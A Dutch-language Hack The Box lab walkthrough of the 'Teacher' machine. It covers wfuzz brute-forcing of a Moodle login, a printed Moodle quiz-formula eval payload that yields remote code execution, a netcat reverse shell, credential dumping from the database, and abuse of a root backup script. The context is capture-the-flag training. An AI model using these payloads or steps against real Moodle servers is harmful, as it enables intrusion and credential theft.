HTB – Teacher

Zoals altijd beginnen we met een nmap scan

c:\PENTEST>nmap -sV 10.10.10.153
Starting Nmap 7.70 ( https://nmap.org ) at 2019-12-13 09:28 W. Europe Standard Time
Nmap scan report for 10.10.10.153
Host is up (0.026s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.25 ((Debian))

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.88 seconds

vervolgens gaan we naar de website

We kunnen zien dat een nieuw portaal open is voor docenten en studenten

klik op andere links, het brengt ons naar de galerij

Stap 2: Dirbuster uitvoeren

blader door de link / afbeeldingen

we kwamen erachter dat de afbeelding 5.png enkele fouten bevat

mogelijk wachtwoord: Th4CoolTheacha

Gebruikersnaam: Giovanni

We weten ook dat CMS moodle op de webserver wordt uitgevoerd

gebruik crunch om een wachtwoordenlijstbestand te genereren

genereer een lengte = 15 wachtwoordenbestanden en probeer te bruteforcen

wfuzz -w wachtwoord.txt -L -d “username = Giovanni & password = FUZZ” – hw 1224 http://10.10.10.153/moodle/login/index.php

Het paswoord is : Th4C00lTheacha#

log in moodle

En we hebben ons op het dashboard aangemeld als Giovanni

Google moodle exploit en ontdekte de “EVIL TEACHER” exploit voor het op afstand uitvoeren van code

https://blog.ripstech.com/2018/moodle-remote-code-execution/

in de wiskundige formulefunctie, laat php-functie eval () ons toe om willekeurige php-code uit te voeren
turn edit on

add a quiz

add some questions

add the successful payload /*{a*/`$_GET[0]`;//{x}} ​

url decode and modify the code to make it be remote code executable

and here we got a reverse shell back with netcat

root@kali:~/htb# rlwrap nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.16.70] from (UNKNOWN) [10.10.10.153] 34996
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
python -c 'import pty; pty.spawn("/bin/bash")'
www-data@teacher:/var/www/html/moodle/question$

 

ga naar de moodle-database, het config.php-bestand bevat het databasewachtwoord

voor mysql

log in de database

SELECT * from mdl_user\G

we vinden een paswoordhash voor giovannibak

google de md5 hash en decrypted het als expelled

pak de user vlag

in de /tmp directory zien we course backup zip bestand

uit het backup.sh-script dat we hebben gevonden in / usr / bin

dit vertelt ons

ga naar home directory / home / giovanni / work

maak een archief met de inhoud van de map met cursussen

blader naar / tmp

geef lees- en schrijfrechten aan iedereen in de map / home / giovanni / work / tmp en submappen

script kan worden gebruikt om de inhoud van de te halen
/ root-map en verkrijg de root-vlag. cursusbestand kan worden hernoemd

dus kunnen we root.txt met het script extraheren

Auteur : Jacco Straathof

Posted on

Leave a Reply

Your email address will not be published. Required fields are marked *